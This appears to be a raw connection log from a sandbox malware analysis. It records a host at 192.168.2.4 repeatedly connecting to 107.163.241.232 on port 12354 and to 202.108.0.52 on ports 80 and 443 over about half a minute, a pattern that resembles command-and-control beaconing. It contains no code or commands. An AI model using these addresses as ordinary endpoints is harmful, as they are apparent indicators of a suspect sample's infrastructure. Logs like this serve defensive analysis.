                                              Dec 11, 2024 16:27:26.102816105 CET8054630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:26.102835894 CET5748180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.102873087 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.107496977 CET5748180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.226821899 CET8057481202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:26.488127947 CET5748180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.488187075 CET5657812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.488329887 CET5649912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.489347935 CET5785312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.608726025 CET1235457853107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:26.608810902 CET5785312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.610502958 CET5785312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.615216970 CET5791812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.616533041 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.730925083 CET1235457853107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:26.736171961 CET1235457918107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:26.736186981 CET8057919202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:26.736265898 CET5791812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.736304045 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.736854076 CET5791812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:26.736959934 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.856234074 CET1235457918107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:26.856450081 CET8057919202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:28.305185080 CET8057919202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:28.305241108 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:28.333163023 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:28.333209991 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:28.333328962 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:28.333869934 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:28.333913088 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:28.906236887 CET1235457853107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:28.906358004 CET5785312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:28.906668901 CET1235457918107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:28.910305977 CET5791812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.039707899 CET5785312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.040329933 CET5908012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.044693947 CET5791812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.159305096 CET1235457853107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:29.159827948 CET1235459080107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:29.160463095 CET5908012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.163957119 CET1235457918107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:29.189845085 CET5908012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.309715033 CET1235459080107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:29.325711012 CET5908212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.445566893 CET1235459082107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:29.445647955 CET5908212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.446361065 CET5908212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:29.567193985 CET1235459082107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.021023035 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.021090984 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.021812916 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.021861076 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.025486946 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.025583029 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.025681019 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.137648106 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.137916088 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.257461071 CET8059691202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.257487059 CET8057919202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.257538080 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.257574081 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.263550997 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.386248112 CET8059691202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.644850016 CET5908212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.644850016 CET5908012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.644905090 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.645966053 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.765919924 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.766814947 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.766930103 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.767079115 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.767363071 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.885505915 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.885586977 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.886140108 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.886204004 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.886857986 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.887018919 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.887260914 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:31.008361101 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:31.008377075 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:32.472419024 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.472498894 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483196974 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483247995 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.483325005 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483858109 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483871937 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.880194902 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:32.880264997 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:32.880980015 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:32.881455898 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.001537085 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.002099991 CET1235461240107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.002161026 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.003000975 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.003061056 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007056952 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007114887 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007492065 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.126657963 CET1235461240107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.126677990 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.127055883 CET1235461332107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.127125025 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.127609015 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.246856928 CET1235461332107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:34.171530008 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.171624899 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.172317028 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.172513008 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175736904 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175786972 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.175920963 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.175971031 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175990105 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.295008898 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.298785925 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.414936066 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.415246010 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.418116093 CET8062571202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.418459892 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.458663940 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.578011990 CET8062571202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.878143072 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:34.882294893 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.882344007 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:34.990134954 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.109494925 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.112421989 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.234143019 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.291704893 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.292412043 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.353882074 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.411125898 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:35.411334991 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.411649942 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.411967039 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.412040949 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.412684917 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.531153917 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:35.532165051 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:36.995332956 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:36.995508909 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.998613119 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.998648882 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:36.998919010 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.999759912 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.999773026 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:37.224697113 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.224816084 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.225493908 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.226006985 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.506880999 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.506997108 CET1235464462107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.507074118 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.507642031 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537146091 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.537220955 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537533045 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537842035 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.723474979 CET1235464462107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724400043 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724406004 CET1235464627107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724514008 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.724898100 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.849337101 CET1235464627107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:38.696712971 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.696845055 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.697494030 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.699332952 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.704448938 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.704479933 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.704602003 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.704736948 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.705995083 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.810995102 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.811386108 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.933717012 CET8065486202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.933784008 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.934273005 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.936779976 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.937109947 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.054023027 CET8065486202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.245786905 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.245796919 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.245831013 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.246975899 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.369024992 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.369107962 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.395287991 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.395651102 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.395875931 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.514945030 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.515032053 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.515033960 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.515080929 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.515120029 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.550822973 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.550941944 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.670101881 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.670171976 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.094141960 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.094225883 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.097287893 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.097340107 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.097501993 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.098313093 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.098324060 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.488337994 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.488676071 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.489350080 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.489907026 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.609509945 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.609524965 CET1235450611107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.609606981 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.609787941 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628189087 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.628345966 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628345966 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628844976 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.730434895 CET1235450611107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748553038 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748569012 CET1235450767107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748651028 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.749639988 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.869050980 CET1235450767107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:42.796442986 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:42.799900055 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:42.799913883 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:42.800295115 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:42.898313999 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:42.898432016 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:42.898494959 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.288744926 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.288794041 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.289243937 CET5143712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.379930973 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.380243063 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.409060001 CET1235451437107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:43.409147024 CET5143712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.417891026 CET5143712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.422657967 CET5144412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.500849009 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:43.500919104 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.501332998 CET8051439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:43.501398087 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.503843069 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:43.542006016 CET1235451437107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:43.547235012 CET1235451444107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:43.547388077 CET5144412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.548168898 CET5144412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:43.624352932 CET8051439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:43.668767929 CET1235451444107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.075170040 CET8051439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:45.075284958 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:45.079025984 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:45.079068899 CET44353009202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:45.079222918 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:45.079870939 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:45.079879045 CET44353009202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:45.518821001 CET1235451437107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.518925905 CET5143712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.519205093 CET5143712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.519701004 CET5324812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.638468981 CET1235451437107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.639100075 CET1235453248107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.639193058 CET5324812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.640289068 CET5324812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.659957886 CET1235451444107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.660031080 CET5144412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.660332918 CET5144412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.660659075 CET5334512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.759614944 CET1235453248107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.779608965 CET1235451444107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.779957056 CET1235453345107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:45.780045033 CET5334512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.780656099 CET5334512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:45.899957895 CET1235453345107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:46.761729002 CET44353009202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:46.761796951 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.762821913 CET44353009202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:46.762897968 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.767338991 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.767389059 CET44353009202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:46.767505884 CET53009443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.873276949 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.873671055 CET5443280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.993596077 CET8054432202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:46.993628025 CET8051439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:46.993765116 CET5143980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.993768930 CET5443280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:46.994575977 CET5443280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:47.114006996 CET8054432202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:47.275420904 CET5443280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:47.275479078 CET5334512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.275577068 CET5324812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.276115894 CET5480012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.395445108 CET1235454800107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:47.395642996 CET5488712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.395728111 CET5480012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.396030903 CET5480012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.397248983 CET5488980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:47.515568972 CET1235454887107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:47.515598059 CET1235454800107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:47.515686035 CET5488712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.516765118 CET8054889202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:47.516840935 CET5488980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:47.536432981 CET5488712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:47.536578894 CET5488980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:47.656647921 CET1235454887107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:47.656665087 CET8054889202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:49.078680992 CET8054889202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:49.079004049 CET5488980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:49.084896088 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:49.084927082 CET44356323202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:49.085978985 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:49.086946964 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:49.086956978 CET44356323202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:49.519361973 CET1235454800107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.519460917 CET5480012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.520157099 CET5480012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.520544052 CET5638212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.628314972 CET1235454887107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.628592014 CET5488712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.646256924 CET1235454800107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.646275997 CET1235456382107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.646404028 CET5638212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.684252024 CET5488712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.684706926 CET5638212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.764679909 CET5640212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:49.803688049 CET1235454887107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.803941965 CET1235456382107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.884263039 CET1235456402107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:49.884531975 CET5640212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:50.071363926 CET5640212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:50.190715075 CET1235456402107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:50.775029898 CET44356323202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:50.775101900 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:50.775855064 CET44356323202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:50.775898933 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:50.779352903 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:50.779403925 CET44356323202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:50.779489040 CET56323443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:50.888535976 CET5488980192.168.2.4202.108.0.52
